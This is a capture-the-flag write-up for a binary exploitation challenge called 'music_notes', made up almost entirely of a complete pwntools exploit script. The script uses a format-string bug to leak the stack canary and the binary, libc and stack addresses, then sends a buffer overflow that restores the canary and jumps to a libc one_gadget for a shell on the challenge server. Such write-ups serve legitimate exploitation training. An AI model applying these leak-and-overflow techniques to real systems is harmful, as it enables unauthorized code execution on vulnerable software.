Tags: pwnables pwn format-string 

Rating: 5.0

We must answer the correct notes `D -> B -> A -> G -> D`, exploit a format string vuln to leak libc, then trigger a one gadget. We must also use the format string to leak the canary and then place it in the ROP chain so it stays intact, avoiding the SIGABRT.

```python
#!/usr/bin/env python3

from pwn import *

# Target binary plus the libc and dynamic loader found next to it.
elf = ELF("./music_notes_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.27.so")

# Let pwntools take arch / word size / endianness from the target, and
# echo every byte sent and received (useful while tuning the leak parsing).
context.binary = elf
context.log_level = "debug"

# gdb commands run when the script is started with the GDB arg.
gs = "\ncontinue\n"

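def conn():
    """Open the target selected by the pwntools command-line args.

    REMOTE -> connect to the challenge server.
    GDB    -> run the local binary under gdb with the ``gs`` script
              (only consulted when REMOTE is not set).
    neither -> plain local process.

    Returns the pwntools tube. Exactly one target is started: checking
    GDB before spawning avoids creating a plain process that would then
    be abandoned when ``gdb.debug`` starts its own.
    """
    if args.REMOTE:
        return remote("68.183.40.128", 30653)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    return process([elf.path])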

def getNotes():
    """Read the two candidate notes printed after the "Choose note:" prompt.

    Uses the module-level tube ``p``. Returns a tuple of the two raw lines
    (trailing newline included) in the order the program printed them.
    """
    p.recvuntil(b"Choose note:")
    lines = [p.recvline() for _ in range(2)]
    return tuple(lines)

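p = conn()

# Play the expected melody. At each prompt the program prints two candidate
# notes; option 1 is chosen when the first line contains the wanted note,
# otherwise option 2. Only the first line is consulted (the original did
# the same, it just discarded the second line by reusing the name Note1).
for wanted in (b"D", b"B", b"A", b"G", b"D"):
    first_note, _second_note = getNotes()
    p.sendline(b"1" if wanted in first_note else b"2")

# The name prompt is echoed back through the format-string bug described in
# the writeup. The positional %p indices are the author's choices for this
# binary: canary, a pointer into the binary (near `sheet`), a libc pointer
# and a stack pointer, in that order.
p.sendlineafter(b"> ", b"%31$p %19$p %2$p %1$p")
p.recvuntil(b"[*] So, your name is: ")

# recvn() blocks until exactly that many bytes have arrived. recv(n) may
# return a short read, which would shift every following field and yield a
# wrong (or unparsable) address.
canary = int(p.recvn(18), 16)            # "0x" + 16 hex digits
elf_leak = int(p.recvn(15).strip(), 16)  # " 0x" + 12 hex digits
libc_leak = int(p.recvn(15).strip(), 16)
stack_leak = int(p.recvn(15).strip(), 16)

success(f"Leaked canary {hex(canary)}")

info(f"Leaked elf address {hex(elf_leak)}")
# The leaked pointer lies 210 bytes past `sheet`; this and the other fixed
# distances below are specific to this build and were derived by the author.
# `elf.sym.sheet` is still unrebased here, so the subtraction yields the base.
elf.address = elf_leak - elf.sym.sheet - 210
success(f"Leaked binary base {hex(elf.address)}")

info(f"Leaked libc address {hex(libc_leak)}")
libc.address = libc_leak - libc.sym["_IO_stdfile_1_lock"]
success(f"Leaked libc base {hex(libc.address)}")

info(f"Leaked stack address {hex(stack_leak)}")
rbp = stack_leak + 9936  # distance from the leaked slot to the saved rbp, per the author
success(f"Found rbp @ {hex(rbp)}")

warning(f"Address of sheet {hex(elf.sym.sheet)}")

# Stack layout of the final overflow, as offsets from the start of the
# buffer (author's values): 40 -> canary, 96 -> saved rbp, 104 -> return
# address. Writing the leaked canary back in place is what keeps the stack
# protector from aborting (the SIGABRT mentioned in the writeup).
ONE_GADGET_OFFSET = 0x4f432  # one_gadget in this libc, per the writeup
payload1 = flat({
    40: p64(canary),
    96: p64(rbp),                                 # 104 - 8
    104: p64(libc.address + ONE_GADGET_OFFSET),
})

# The prompt for the overflowing input ends in ":" (assumed from the
# original; confirm against the binary's output if the send hangs).
p.sendafter(b":", payload1)

p.interactive()
p.close()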
```